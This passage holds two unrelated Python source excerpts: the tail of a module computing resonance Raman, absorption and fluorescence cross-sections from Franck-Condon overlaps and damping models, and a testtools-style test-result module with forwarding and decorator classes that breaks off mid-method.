            FC2.append(t20D(t, D[i], RMg[i]))
        else:
            # different frequencies: B-type expressions
            FC0.append(t00B(t, D[i], RMg[i], RMe[i]))
            FC0p.append(t00B(t, D[i], RMe[i], RMg[i]))  # fluorescence overlap has excited state and ground state Raman frequencies switched
            FC1.append(t10B(t, D[i], RMg[i], RMe[i]))
            FC2.append(t20B(t, D[i], RMg[i], RMe[i]))
    # go to numpy array..
    FC0 = np.array(FC0)
    FC0p = np.array(FC0p)
    FC1 = np.array(FC1)
    FC2 = np.array(FC2)
    # Rayleigh / absorption overlap = product of all 0-0 factors
    oabs = 1.0 + 0.0 * 1j  # reuse this term for the raman overlaps
    for i in range(N):
        oabs = oabs * FC0[i]
    ovlps.append(oabs)
    # fluorescence overlap = product of all 0-0 fluorescence factors
    o = 1.0 + 0.0 * 1j
    for i in range(N):
        o = o * FC0p[i]
    ovlps.append(o)
    # actual Raman overlaps
    for j in range(M):
        o = 1.0 * oabs  # all raman modes are based on this product and additional terms given by the excited modes
        for i in range(N):
            if(nquanta[j][i] == 1):
                o = o * FC1[i]
            elif(nquanta[j][i] == 2):
                o = o * FC2[i]
        ovlps.append(o)
    return ovlps
def getZeroZeroEnergy(t, E0):
    """Time-domain oscillation term arising from the electronic zero-zero energy E0.

    :param array t: Time axis (fs).
    :param float E0: Difference between excited and ground state vibrational ground state energies, *zero-zero energy* (cm-1).
    :returns: Complex phase factor exp(-i E0 t / hbar), same shape as t.
    """
    phase = -1j * E0 / hbar * t
    return np.exp(phase)
def getHomogeneousDamping(t, Gamma, alpha=0, lmbda=0):
    """Damping term arising from the homogeneous linewidth of the electronic transition, with phenomenological support for a Stokes shift.

    .. note:: Added phenomenological Stokes shift to input parameters on 10-12-2015. See for example *New J Phys* **11**, 015001 (2009), Eqs. (1) and (2).
    :param array t: Time axis (fs).
    :param float Gamma: Decay rate according to :math:`1 / \\tau` in (cm-1), where :math:`tau` is exponential dephasing time.
    :param float alpha: Line shape parameter:
    - 1 = Gaussian
    - 0 = Lorentzian
    :param float lmbda: Phenomenological Stokes shift (cm-1) which is added as imaginary part to g(t). Compared to the Brownian oscillator models, lmbda **is** the observed Stokes shift. (default = 0)
    :returns: Damping term in the time domain, :math:`e^{-g(t) - i \lambda t / 2 \hbar}`.
    """
    gauss = Gamma**2 / hbar**2 * t**2    # Gaussian contribution
    lorentz = Gamma / hbar * t           # Lorentzian contribution
    stokes = 1j * lmbda / 2.0 * t / hbar # phenomenological Stokes shift
    g = alpha * gauss + (1 - alpha) * lorentz + stokes
    return np.exp(-g)
def getKuboDamping(t, Delta, Lambda):
    """Damping term from Kubo's *stochastic model*. This model describes the broadening, but does not yield solvent induced Stokes shifts.

    :param array t: Time axis (fs).
    :param float Delta: Magnitude of solvent energy gap fluctuations (cm-1). This parameter also controls the effective line shape:
    - Delta >> Lambda = Lorentzian
    - Delta << Lambda = Gaussian
    :param float Lambda: Effective frequency of solvent fluctuations (cm-1).
    :returns: Damping term in the time domain, :math:`e^{-g(t)}`.
    .. seealso:: Myers, *J. Raman. Spectrosc.* **28**, 389 (1997)
    """
    x = Lambda / hbar * t
    return np.exp(-(Delta / Lambda)**2 * (np.exp(-x) + x - 1.0))
def getBrownianDamping(t, kappa, T, egamma, cutoff=1e-6):
    """Calculate the damping term using Mukamel's Brownian oscillator model based on Myers Fortran code. The real part of g(t) leads to a Gaussian broadening of the spectra, while the imaginary part leads to a solvent induced Stokes shift.
    :param array t: Time axis (fs).
    :param float kappa: Lineshape parameter:
    - kappa >> 1 = Lorentzian,
    - kappa << 1 = Gaussian.
    :param float T: Temperature in K.
    :param float egamma: Electronic homogeneous linewidth (**FWHM**, cm-1).
    :param float cutoff: Cutoff for sum over Brownian oscillators. Typically between 1e-6 (default) and 1e-8. Check for convergence by re-running with different values.
    :returns: Damping term in the time domain, :math:`e^{-g(t)}`.
    .. seealso:: Myers, *J. Raman. Spectrosc.* **28**, 389 (1997)
    """
    temp = np.absolute(T)
    # ----------------------------------------------------------
    # 1: derive Mukamel's parameters from kappa, temp and egamma
    # I do not have a reference for this part - it's taken from Myers fortran code
    # Boltzmann beta
    beta = 1.0 / (kB * temp)  # 1/cm-1
    # some 'a' parameter (this comes from Myers Fortran program)
    a = (2.355 + 1.76 * kappa) / (1.0 + 0.85 * kappa + 0.88 * kappa**2)
    # these are Mukamel's parameters in Myers, J. Raman. Spec. 28, 389 (1997), eqs. (35) to (38)
    Lambda = kappa * egamma / a  # cm-1
    lmbda = beta * (Lambda / kappa)**2 / 2.0  # cm-1
    # ----------------------------------------------------------
    # 2: calculate the sum over n Brownian oscillators, adding terms until
    # the relative increment falls below `cutoff`
    vs = np.zeros(len(t))  # this is the sum over the n oscillators as function of time in (cm-1)**-3
    n = 0
    while(True):
        n = n + 1
        vn = 2.0 * np.pi * n / beta  # cm-1
        vinc = (np.exp(-vn / hbar * t) + vn / hbar * t - 1) / (vn * (vn**2 - Lambda**2))
        vs = vs + vinc
        if(np.amax(np.absolute(vinc[1:] / vs[1:])) < cutoff):  # the first element of vs is always 0
            break
    # ----------------------------------------------------------
    # 3: calculate the damping function g(t)
    gexp = np.exp(-Lambda / hbar * t) + Lambda / hbar * t - 1.0  # dimensionless
    greal = (lmbda / Lambda) / np.tan(beta * Lambda / 2.0) * gexp  # dimensionless
    greal = greal + 4.0 * lmbda * Lambda / beta * vs  # dimensionless
    gimag = -(lmbda / Lambda) * gexp  # dimensionless; solvent-induced Stokes shift
    g = greal + 1j * gimag  # dimensionless
    return np.exp(-g)
def getBrownianDamping2(t, lmbda, Lambda, T=298.0, cutoff=1e-6):
    """Calculate pure electronic dephasing due to interaction with solvent using frictionally overdamped Brownian oscillator model.
    The real part of g(t) leads to a Gaussian broadening of the spectra, while the imaginary part leads to a solvent induced Stokes shift.
    :param array t: Time axis in fs.
    :param float lmbda: Solvent contribution to reorganization energy (cm-1).
    :param float Lambda: Inverse of characteristic time scale for solvent fluctuations (fs-1).
    :param float T: Temperature (K, default = 298 K).
    :param float cutoff: Cutoff value for summation over brownian oscillators (default 1e-6).
    :returns: Damping term in the time domain, :math:`e^{-g(t)}`.
    .. seealso:: This implementation is taken from Kulinowksi, *J Phys Chem* **99**, 9017 (1995), Eqs. (10a) to (10d).
    """
    beta = 1.0 / (kB * np.absolute(T))
    lmb = lmbda / hbar  # convert to fs-1
    # calculate real part as sum over Brownian oscillators
    gR = 0.0
    i = 1.0
    while(1):
        nun = 2.0 * np.pi / (hbar * beta) * i  # frequency of ith oscillator
        dg = (np.exp(-nun * t) + nun * t - 1.0) / (nun * (nun**2 - Lambda**2))
        gR = gR + dg
        i = i + 1.0
        # BUGFIX: was `np.dg` (AttributeError: numpy has no `dg`); the local
        # increment `dg` is the quantity to test for convergence
        if np.sum(np.absolute(dg)) / np.sum(np.absolute(gR)) < cutoff:
            break
    gR = gR * 4.0 * lmb * Lambda / (hbar * beta)
    # BUGFIX: numpy has no `np.cot`; cot(x) = 1 / tan(x)
    gR = gR + (lmb / Lambda) / np.tan(hbar * beta * Lambda / 2.0) * (np.exp(-Lambda * t) + Lambda * t - 1.0)
    # calculate imaginary part = Stokes shift
    gI = -(lmb / Lambda) * (np.exp(-Lambda * t) - 1.0)
    # assemble
    g = gR + 1j * gI  # dimensionless
    return np.exp(-g)
def getBrownianDampingSlowMod(t, lmbda, T=298.0):
    """Pure electronic dephasing from the frictionally overdamped Brownian oscillator model in the high-temperature and slow-modulation limit.

    The real part of g(t) leads to a Gaussian broadening of the spectra, while the imaginary part leads to a solvent induced Stokes shift.
    :param array t: Time axis in fs.
    :param float lmbda: Solvent contribution to reorganization energy (cm-1).
    :param float T: Temperature (K, default = 298 K).
    :returns: Damping term in the time domain, :math:`e^{-g(t)}`.
    .. seealso:: This implementation is taken from Kulinowksi, *J Phys Chem* **99**, 9017 (1995), Eq. (11).
    """
    lmb = lmbda / hbar  # convert to fs-1
    real_part = lmb * kB * np.absolute(T) * t**2 / hbar  # Gaussian broadening
    imag_part = lmb * t                                  # Stokes shift
    return np.exp(-(real_part + 1j * imag_part))
def applyInhomogeneousBroadening(wn, y, sig, alpha=1):
    """Convolute a spectrum with a Gaussian/Lorentzian to account for inhomogeneous broadening.

    :param array wn: Frequency axis in same units as sig (cm-1).
    :param array y: Input spectrum, same shape as wn.
    :param float sig: Width of convolution function in same units as x (standard deviation of Gaussian distribution). Must not be zero.
    :param float alpha: Lineshape parameter:
    - 1 = Gaussian,
    - 0 = Lorentzian.
    :returns: Convoluted spectrum (same shape as y).
    """
    center = (wn[-1] + wn[0]) / 2.0
    detune = wn - center
    # normalized Gaussian part of the kernel
    kernel = alpha / (sig * np.sqrt(2 * np.pi)) * np.exp(-detune**2 / (2.0 * sig**2))
    # normalized Lorentzian part of the kernel
    kernel = kernel + (1 - alpha) * sig / (np.pi * (detune**2 + sig**2))
    # np.convolve uses a sum, whereas the function we want uses an integral;
    # multiply by the grid spacing dwn to approximate it
    dwn = wn[1] - wn[0]
    return dwn * np.convolve(y, kernel, 'same')
def prefA(eEL, M, IOR, dt):
    """Return the prefactor for the absorption cross section calculation in (A**2 / molec).

    :param array eEL: Laser excitation energy in (cm-1). May also be a single float value.
    :param float M: Electronic transition dipole length in (A).
    :param float IOR: Index of refraction of surrounding solvent / medium.
    :param float dt: Time increment used for integration (fs).
    :returns: Prefactor for absorption cross section calculation.
    .. seealso:: Myers, Eq. (35).
    """
    # 5.7579e-6 collects the esu -> SI unit conversions (divide by 4 pi eps0);
    # the / 2.0 matches numpy's rfft normalization, which is not completely
    # identical to the half-sided FT integral
    const = 5.7579e-6 / 2.0
    return const * M**2 * eEL * dt / IOR
def prefR(eEL, M, eR, dt):
    """Return the prefactor for the Raman excitation profile calculation (A**2 / molec).

    :param array eEL: Laser excitation energies in (cm-1). Can also be a single floating point value.
    :param float M: Electronic transition dipole moment in (A).
    :param float eR: Stokes shift of the Raman line in (cm-1).
    :param float dt: Time increment for the integration (fs).
    :returns: The prefactor for the Raman excitation profile calculation.
    .. seealso:: Myers, Eq. (34) and following text.
    """
    eES = eEL - eR  # energy of the Stokes-shifted photons
    # 2.0831e-20 converts from esu (divide by (4 pi eps0)**2); the 1e-6 is
    # for fs instead of ps in the double time integral and is consistent with
    # Myers' Fortran code (it differs from the 1e4 factor in the
    # Valley & Hoffman code!)
    return 2.0831e-20 * 1e-6 * M**4 * eES**3 * eEL * dt**2
def prefF(eEF, M, IOR, dt):
    """Return the prefactor for the fluorescence efficiency calculation (unitless).

    See :py:func:`getCrossSections` for more details.

    :param array eEF: Fluorescence energy in (cm-1). May also be a single float value.
    :param float M: Electronic transition dipole length in (A).
    :param float IOR: Index of refraction of surrounding solvent / medium.
    :param float dt: Time increment used for integration (fs).
    :returns: Prefactor for fluorescence efficiency calculation.

    .. seealso:: Myers, *Chem. Phys.* **180**, 215 (1994), Eqs. (6) and (26).
    """
    # 3.6656e-22 carries the esu -> SI conversion (division by 4 pi eps0 is
    # folded into the constant); the final /2 compensates numpy's rfft
    # normalization so the result matches the half-sided FT integral.
    rfft_norm = 2.0
    return 3.6656e-22 * IOR * M**2 * eEF**3 * dt / rfft_norm
def getCrossSections(t, wn, E0, ovlps, sshift, M, IOR, damp=1, sig=0, ialpha=1):
    """Calculate the absorption and Raman cross-sections and the fluorescence efficiency.

    The fluorescence efficiency is a unitless quantity which may be used
    to calculate the fluorescence rate (=rate of spontaneous emission) by integrating
    over the frequency axis (see Myers, *Chem. Phys.* **180**, 215 (1994) Eq. 6 and
    discussion).

    .. note:: Changed shape of input parameters and shape of return values on 10-07-2015.

    :param array t: Time axis in (fs). This axis is used for the calculation of the zero-zero energy term in the time domain.
    :param array wn: Wavenumber axis in (cm-1). Same shape as t.
    :param array E0: Zero-zero energy. This function then calculates the time domain part using `getZeroZeroEnergy`.
    :param array ovlps: M + 2 Absorption, fluorescence and Raman overlap integrals.
    :param array sshift: Vibrational frequencies of the M Raman modes to calculate (cm-1); indexed per Raman overlap.
    :param float M: Electronic transition dipole length (A).
    :param float IOR: Index of refraction of surrounding medium / solvent.
    :param array damp: Damping function in the time domain. Same shape as t. Set to 1 if no damping is used (default).
    :param float sig: Linewidth for inhomogeneous damping (standard deviation of Gaussian), set to zero if not used (default).
    :param float ialpha: Lineshape parameter for inhomogeneous damping:

        - 1 = Gaussian (default),
        - 0 = Lorentzian.

    :returns: Absorption (sigmaA), M Raman cross sections (sigmaR[M]), both in A**2 / mol., and fluorescence efficiency spectrum, kF (arrays have same shape as wn); all as function of excitation wavenumber.
    """
    Npoints = len(wn)
    # Time step (fs); assumes t is uniformly spaced -- it is the integration
    # increment handed to the prefactor functions.
    dt = t[1] - t[0]
    # Calculate the zero-zero energy time-domain part (see getZeroZeroEnergy).
    tdpart = getZeroZeroEnergy(t, E0)
    # Absorption cross section - using the half sided FT (equivalent to rfft).
    # Npoints restores the amplitude because numpy normalizes the inverse FFT.
    tmp = np.real(Npoints * np.fft.irfft(ovlps[0] * tdpart * damp, Npoints))
    if(sig > 0):
        # Optional convolution with an inhomogeneous (Gaussian/Lorentzian) lineshape.
        tmp = applyInhomogeneousBroadening(wn, tmp, sig, ialpha)
    sigmaA = prefA(wn, M, IOR, dt) * tmp
    # fluorescence rate / intensity - using half sided FT - similar to absorption
    # in order to account for the sign change, the zero-zero energy time domain part
    # and the damping term had to be separated; use the tdpart conjugated and change
    # irfft by hfft to get the factor exp(-1j w t)
    # numpy does not normalize the forward FFT, so no factor Npoints
    tmp = np.real(np.fft.hfft(ovlps[1] * np.conjugate(tdpart) * damp, Npoints))
    if(sig > 0):
        tmp = applyInhomogeneousBroadening(wn, tmp, sig, ialpha)
    kF = prefF(wn, M, IOR, dt) * tmp
    # Raman cross sections - using a standard FT; one profile per Raman mode.
    sigmaR = []
    for i, ovlp in enumerate(ovlps[2:]): # iterate over all lines
        tmp = np.absolute(Npoints * np.fft.ifft(ovlp * tdpart * damp, Npoints))**2 # use again the inverse transform to get "exp(1j w t)"
        if(sig > 0):
            tmp = applyInhomogeneousBroadening(wn, tmp, sig, ialpha)
        sigmaR.append(prefR(wn, M, sshift[i], dt) * tmp)
    return sigmaA, sigmaR, kF
|
"""Test results and related things."""
__metaclass__ = type
__all__ = [
'ExtendedToOriginalDecorator',
'MultiTestResult',
'TestResult',
'ThreadsafeForwardingResult',
]
import datetime
import sys
import unittest
from testtools.compat import all, _format_exc_info, str_is_unicode, _u
# Shared zero-length offset returned by both utcoffset() and dst().
_ZERO = datetime.timedelta(0)


class UTC(datetime.tzinfo):
    """Concrete tzinfo implementing Coordinated Universal Time (zero offset)."""

    def utcoffset(self, dt):
        # UTC is, by definition, at zero offset from UTC.
        return _ZERO

    def tzname(self, dt):
        # Canonical zone name.
        return "UTC"

    def dst(self, dt):
        # UTC never observes daylight saving time.
        return _ZERO


# Module-level singleton used wherever an aware UTC datetime is required.
utc = UTC()
class TestResult(unittest.TestResult):
    """Subclass of unittest.TestResult extending the protocol for flexibility.

    This test result supports an experimental protocol for providing additional
    data to in test outcomes. All the outcome methods take an optional dict
    'details'. If supplied any other detail parameters like 'err' or 'reason'
    should not be provided. The details dict is a mapping from names to
    MIME content objects (see testtools.content). This permits attaching
    tracebacks, log files, or even large objects like databases that were
    part of the test fixture. Until this API is accepted into upstream
    Python it is considered experimental: it may be replaced at any point
    by a newer version more in line with upstream Python. Compatibility would
    be aimed for in this case, but may not be possible.

    :ivar skip_reasons: A dict of skip-reasons -> list of tests. See addSkip.
    """

    def __init__(self):
        """Initialize the result in a pristine state."""
        # startTestRun resets all attributes, and older clients don't know to
        # call startTestRun, so it is called once here.
        # Because subclasses may reasonably not expect this, we call the
        # specific version we want to run.
        TestResult.startTestRun(self)

    def addExpectedFailure(self, test, err=None, details=None):
        """Called when a test has failed in an expected manner.

        Like with addSuccess and addError, testStopped should still be called.

        :param test: The test that has been skipped.
        :param err: The exc_info of the error that was raised.
        :return: None
        """
        # This is the python 2.7 implementation
        self.expectedFailures.append(
            (test, self._err_details_to_string(test, err, details)))

    def addError(self, test, err=None, details=None):
        """Called when an error has occurred. 'err' is a tuple of values as
        returned by sys.exc_info().

        :param details: Alternative way to supply details about the outcome.
            see the class docstring for more information.
        """
        # Exactly one of err / details is expected (see _err_details_to_string).
        self.errors.append((test,
            self._err_details_to_string(test, err, details)))

    def addFailure(self, test, err=None, details=None):
        """Called when an error has occurred. 'err' is a tuple of values as
        returned by sys.exc_info().

        :param details: Alternative way to supply details about the outcome.
            see the class docstring for more information.
        """
        self.failures.append((test,
            self._err_details_to_string(test, err, details)))

    def addSkip(self, test, reason=None, details=None):
        """Called when a test has been skipped rather than running.

        Like with addSuccess and addError, testStopped should still be called.

        This must be called by the TestCase. 'addError' and 'addFailure' will
        not call addSkip, since they have no assumptions about the kind of
        errors that a test can raise.

        :param test: The test that has been skipped.
        :param reason: The reason for the test being skipped. For instance,
            u"pyGL is not available".
        :param details: Alternative way to supply details about the outcome.
            see the class docstring for more information.
        :return: None
        """
        if reason is None:
            # Fall back to the details dict; its 'reason' value is a content
            # object whose text fragments are joined into one string.
            reason = details.get('reason')
            if reason is None:
                reason = 'No reason given'
            else:
                reason = ''.join(reason.iter_text())
        # Group tests by identical skip reason.
        skip_list = self.skip_reasons.setdefault(reason, [])
        skip_list.append(test)

    def addSuccess(self, test, details=None):
        """Called when a test succeeded."""

    def addUnexpectedSuccess(self, test, details=None):
        """Called when a test was expected to fail, but succeed."""
        self.unexpectedSuccesses.append(test)

    def wasSuccessful(self):
        """Has this result been successful so far?

        If there have been any errors, failures or unexpected successes,
        return False.  Otherwise, return True.

        Note: This differs from standard unittest in that we consider
        unexpected successes to be equivalent to failures, rather than
        successes.
        """
        return not (self.errors or self.failures or self.unexpectedSuccesses)

    # Choose a unicode-safe traceback formatter at class-definition time.
    if str_is_unicode:
        # Python 3 and IronPython strings are unicode, use parent class method
        _exc_info_to_unicode = unittest.TestResult._exc_info_to_string
    else:
        # For Python 2, need to decode components of traceback according to
        # their source, so can't use traceback.format_exception
        # Here follows a little deep magic to copy the existing method and
        # replace the formatter with one that returns unicode instead
        from types import FunctionType as __F, ModuleType as __M
        __f = unittest.TestResult._exc_info_to_string.im_func
        __g = dict(__f.func_globals)
        # Shadow the 'traceback' module with a fake one whose
        # format_exception returns unicode.
        __m = __M("__fake_traceback")
        __m.format_exception = _format_exc_info
        __g["traceback"] = __m
        _exc_info_to_unicode = __F(__f.func_code, __g, "_exc_info_to_unicode")
        del __F, __M, __f, __g, __m

    def _err_details_to_string(self, test, err=None, details=None):
        """Convert an error in exc_info form or a contents dict to a string."""
        if err is not None:
            return self._exc_info_to_unicode(err, test)
        return _details_to_str(details, special='traceback')

    def _now(self):
        """Return the current 'test time'.

        If the time() method has not been called, this is equivalent to
        datetime.now(), otherwise its the last supplied datestamp given to the
        time() method.
        """
        if self.__now is None:
            return datetime.datetime.now(utc)
        else:
            return self.__now

    def startTestRun(self):
        """Called before a test run starts.

        New in Python 2.7. The testtools version resets the result to a
        pristine condition ready for use in another test run.  Note that this
        is different from Python 2.7's startTestRun, which does nothing.
        """
        # Reset the unittest.TestResult state (errors, failures, testsRun...).
        super(TestResult, self).__init__()
        self.skip_reasons = {}
        # None means "use the real clock"; see time() and _now().
        self.__now = None
        # -- Start: As per python 2.7 --
        self.expectedFailures = []
        self.unexpectedSuccesses = []
        # -- End:   As per python 2.7 --

    def stopTestRun(self):
        """Called after a test run completes

        New in python 2.7
        """

    def time(self, a_datetime):
        """Provide a timestamp to represent the current time.

        This is useful when test activity is time delayed, or happening
        concurrently and getting the system time between API calls will not
        accurately represent the duration of tests (or the whole run).

        Calling time() sets the datetime used by the TestResult object.
        Time is permitted to go backwards when using this call.

        :param a_datetime: A datetime.datetime object with TZ information or
            None to reset the TestResult to gathering time from the system.
        """
        self.__now = a_datetime

    def done(self):
        """Called when the test runner is done.

        deprecated in favour of stopTestRun.
        """
class MultiTestResult(TestResult):
    """A test result that dispatches to many test results."""

    def __init__(self, *results):
        TestResult.__init__(self)
        # Wrap every target so each supports the extended details protocol.
        self._results = [ExtendedToOriginalDecorator(result)
                         for result in results]

    def __repr__(self):
        inner = ', '.join(repr(result) for result in self._results)
        return '<%s (%s)>' % (self.__class__.__name__, inner)

    def _dispatch(self, message, *args, **kwargs):
        """Invoke ``message`` on every wrapped result, returning all outcomes."""
        outcomes = []
        for result in self._results:
            outcomes.append(getattr(result, message)(*args, **kwargs))
        return tuple(outcomes)

    def startTest(self, test):
        return self._dispatch('startTest', test)

    def stopTest(self, test):
        return self._dispatch('stopTest', test)

    def addError(self, test, error=None, details=None):
        return self._dispatch('addError', test, error, details=details)

    def addExpectedFailure(self, test, err=None, details=None):
        return self._dispatch(
            'addExpectedFailure', test, err, details=details)

    def addFailure(self, test, err=None, details=None):
        return self._dispatch('addFailure', test, err, details=details)

    def addSkip(self, test, reason=None, details=None):
        return self._dispatch('addSkip', test, reason, details=details)

    def addSuccess(self, test, details=None):
        return self._dispatch('addSuccess', test, details=details)

    def addUnexpectedSuccess(self, test, details=None):
        return self._dispatch('addUnexpectedSuccess', test, details=details)

    def startTestRun(self):
        return self._dispatch('startTestRun')

    def stopTestRun(self):
        return self._dispatch('stopTestRun')

    def time(self, a_datetime):
        return self._dispatch('time', a_datetime)

    def done(self):
        return self._dispatch('done')

    def wasSuccessful(self):
        """Was this result successful?

        Only returns True if every constituent result was successful.
        """
        return all(self._dispatch('wasSuccessful'))
class TextTestResult(TestResult):
    """A TestResult which outputs activity to a text stream."""

    def __init__(self, stream):
        """Construct a TextTestResult writing to stream."""
        super(TextTestResult, self).__init__()
        self.stream = stream
        # Separator lines used when listing errors/failures.
        self.sep1 = '=' * 70 + '\n'
        self.sep2 = '-' * 70 + '\n'

    def _delta_to_float(self, a_timedelta):
        """Convert a timedelta to a float number of seconds."""
        return (a_timedelta.days * 86400.0 + a_timedelta.seconds +
            a_timedelta.microseconds / 1000000.0)

    def _show_list(self, label, error_list):
        # Write one separator-framed section per (test, output) pair.
        for test, output in error_list:
            self.stream.write(self.sep1)
            self.stream.write("%s: %s\n" % (label, test.id()))
            self.stream.write(self.sep2)
            self.stream.write(output)

    def startTestRun(self):
        """Reset state and note the wall-clock start of the run."""
        super(TextTestResult, self).startTestRun()
        # Name-mangled to _TextTestResult__start; read back in stopTestRun.
        self.__start = self._now()
        self.stream.write("Tests running...\n")

    def stopTestRun(self):
        """Write the run summary: errors, failures, counts and elapsed time."""
        if self.testsRun != 1:
            plural = 's'
        else:
            plural = ''
        stop = self._now()
        self._show_list('ERROR', self.errors)
        self._show_list('FAIL', self.failures)
        for test in self.unexpectedSuccesses:
            self.stream.write(
                "%sUNEXPECTED SUCCESS: %s\n%s" % (
                    self.sep1, test.id(), self.sep2))
        self.stream.write("\nRan %d test%s in %.3fs\n" %
            (self.testsRun, plural,
             self._delta_to_float(stop - self.__start)))
        if self.wasSuccessful():
            self.stream.write("OK\n")
        else:
            self.stream.write("FAILED (")
            details = []
            # NOTE: the reported "failures" count aggregates failures, errors
            # and unexpected successes into a single number.
            details.append("failures=%d" % (
                sum(map(len, (
                    self.failures, self.errors, self.unexpectedSuccesses)))))
            self.stream.write(", ".join(details))
            self.stream.write(")\n")
        super(TextTestResult, self).stopTestRun()
class ThreadsafeForwardingResult(TestResult):
    """A TestResult which ensures the target does not receive mixed up calls.

    This is used when receiving test results from multiple sources, and batches
    up all the activity for a single test into a thread-safe batch where all
    other ThreadsafeForwardingResult objects sharing the same semaphore will be
    locked out.

    Typical use of ThreadsafeForwardingResult involves creating one
    ThreadsafeForwardingResult per thread in a ConcurrentTestSuite. These
    forward to the TestResult that the ConcurrentTestSuite run method was
    called with.

    target.done() is called once for each ThreadsafeForwardingResult that
    forwards to the same target. If the target's done() takes special action,
    care should be taken to accommodate this.
    """

    def __init__(self, target, semaphore):
        """Create a ThreadsafeForwardingResult forwarding to target.

        :param target: A TestResult.
        :param semaphore: A threading.Semaphore with limit 1.
        """
        TestResult.__init__(self)
        # Wrap the target so it accepts the extended details protocol.
        self.result = ExtendedToOriginalDecorator(target)
        self.semaphore = semaphore

    def __repr__(self):
        return '<%s %r>' % (self.__class__.__name__, self.result)

    def _add_result_with_semaphore(self, method, test, *args, **kwargs):
        """Forward one complete test outcome atomically.

        While holding the semaphore, replays the batched start time, the
        startTest/outcome/stopTest sequence on the wrapped target so calls
        from different threads never interleave.
        """
        self.semaphore.acquire()
        try:
            # Replay the recorded start time, then the current time, so the
            # target sees a plausible duration for this test.
            self.result.time(self._test_start)
            self.result.startTest(test)
            self.result.time(self._now())
            try:
                method(test, *args, **kwargs)
            finally:
                self.result.stopTest(test)
        finally:
            self.semaphore.release()

    def addError(self, test, err=None, details=None):
        self._add_result_with_semaphore(self.result.addError,
            test, err, details=details)

    def addExpectedFailure(self, test, err=None, details=None):
        self._add_result_with_semaphore(self.result.addExpectedFailure,
            test, err, details=details)

    def addFailure(self, test, err=None, details=None):
        self._add_result_with_semaphore(self.result.addFailure,
            test, err, details=details)

    def addSkip(self, test, reason=None, details=None):
        self._add_result_with_semaphore(self.result.addSkip,
            test, reason, details=details)

    def addSuccess(self, test, details=None):
        self._add_result_with_semaphore(self.result.addSuccess,
            test, details=details)

    def addUnexpectedSuccess(self, test, details=None):
        self._add_result_with_semaphore(self.result.addUnexpectedSuccess,
            test, details=details)

    def startTestRun(self):
        # Run-level events are forwarded directly, still under the semaphore.
        self.semaphore.acquire()
        try:
            self.result.startTestRun()
        finally:
            self.semaphore.release()

    def stopTestRun(self):
        self.semaphore.acquire()
        try:
            self.result.stopTestRun()
        finally:
            self.semaphore.release()

    def done(self):
        self.semaphore.acquire()
        try:
            self.result.done()
        finally:
            self.semaphore.release()

    def startTest(self, test):
        # Record when the test started; replayed to the target later in
        # _add_result_with_semaphore.
        self._test_start = self._now()
        super(ThreadsafeForwardingResult, self).startTest(test)

    def wasSuccessful(self):
        return self.result.wasSuccessful()
class ExtendedToOriginalDecorator(object):
    """Permit new TestResult API code to degrade gracefully with old results.

    This decorates an existing TestResult and converts missing outcomes
    such as addSkip to older outcomes such as addSuccess. It also supports
    the extended details protocol. In all cases the most recent protocol
    is attempted first, and fallbacks only occur when the decorated result
    does not support the newer style of calling.
    """

    def __init__(self, decorated):
        self.decorated = decorated

    def __repr__(self):
        return '<%s %r>' % (self.__class__.__name__, self.decorated)

    def __getattr__(self, name):
        # Anything not explicitly handled is forwarded to the wrapped result.
        return getattr(self.decorated, name)

    def addError(self, test, err=None, details=None):
        """Forward addError, converting details to exc_info if unsupported."""
        self._check_args(err, details)
        if details is not None:
            try:
                # Newest protocol first: pass the details dict directly.
                return self.decorated.addError(test, details=details)
            except TypeError:
                # have to convert
                err = self._details_to_exc_info(details)
        return self.decorated.addError(test, err)

    def addExpectedFailure(self, test, err=None, details=None):
        """Forward addExpectedFailure; fall back to addSuccess if missing."""
        self._check_args(err, details)
        addExpectedFailure = getattr(
            self.decorated, 'addExpectedFailure', None)
        if addExpectedFailure is None:
            # Old results know nothing of expected failures; count as success.
            return self.addSuccess(test)
        if details is not None:
            try:
                return addExpectedFailure(test, details=details)
            except TypeError:
                # have to convert
                err = self._details_to_exc_info(details)
        return addExpectedFailure(test, err)

    def addFailure(self, test, err=None, details=None):
        """Forward addFailure, converting details to exc_info if unsupported."""
        self._check_args(err, details)
        if details is not None:
            try:
                return self.decorated.addFailure(test, details=details)
            except TypeError:
                # have to convert
                err = self._details_to_exc_info(details)
        return self.decorated.addFailure(test, err)

    def addSkip(self, test, reason=None, details=None):
        """Forward addSkip; fall back to addSuccess or a string reason."""
        self._check_args(reason, details)
        addSkip = getattr(self.decorated, 'addSkip', None)
        if addSkip is None:
            # Old results know nothing of skips; count as success.
            return self.decorated.addSuccess(test)
        if details is not None:
            try:
                return addSkip(test, details=details)
            except TypeError:
                # extract the reason if it's available
                try:
                    reason = ''.join(details['reason'].iter_text())
                except KeyError:
                    reason = _details_to_str(details)
        return addSkip(test, reason)

    def addUnexpectedSuccess(self, test, details=None):
        """Forward addUnexpectedSuccess; synthesize a failure if missing."""
        outcome = getattr(self.decorated, 'addUnexpectedSuccess', None)
        if outcome is None:
            # Old result: report as a failure by raising/catching the test's
            # own failureException to build a real exc_info tuple.
            try:
                test.fail("")
            except test.failureException:
                return self.addFailure(test, sys.exc_info())
        if details is not None:
            try:
                return outcome(test, details=details)
            except TypeError:
                pass
        return outcome(test)

    def addSuccess(self, test, details=None):
        if details is not None:
            try:
                return self.decorated.addSuccess(test, details=details)
            except TypeError:
                # Details not supported; drop them silently.
                pass
        return self.decorated.addSuccess(test)

    def _check_args(self, err, details):
        """Raise ValueError unless exactly one of err/details was supplied."""
        param_count = 0
        if err is not None:
            param_count += 1
        if details is not None:
            param_count += 1
        if param_count != 1:
            raise ValueError("Must pass only one of err '%s' and details '%s"
                % (err, details))

    def _details_to_exc_info(self, details):
        """Convert a details dict to an exc_info tuple."""
        return (
            _StringException,
            _StringException(_details_to_str(details, special='traceback')),
            None)

    def done(self):
        # done() is optional on old results.
        try:
            return self.decorated.done()
        except AttributeError:
            return

    def progress(self, offset, whence):
        # progress() is optional; silently ignore if absent.
        method = getattr(self.decorated, 'progress', None)
        if method is None:
            return
        return method(offset, whence)

    @property
    def shouldStop(self):
        return self.decorated.shouldStop

    def startTest(self, test):
        return self.decorated.startTest(test)

    def startTestRun(self):
        # startTestRun() is optional on old results.
        try:
            return self.decorated.startTestRun()
        except AttributeError:
            return

    def stop(self):
        return self.decorated.stop()

    def stopTest(self, test):
        return self.decorated.stopTest(test)

    def stopTestRun(self):
        # stopTestRun() is optional on old results.
        try:
            return self.decorated.stopTestRun()
        except AttributeError:
            return

    def tags(self, new_tags, gone_tags):
        # tags() is optional; silently ignore if absent.
        method = getattr(self.decorated, 'tags', None)
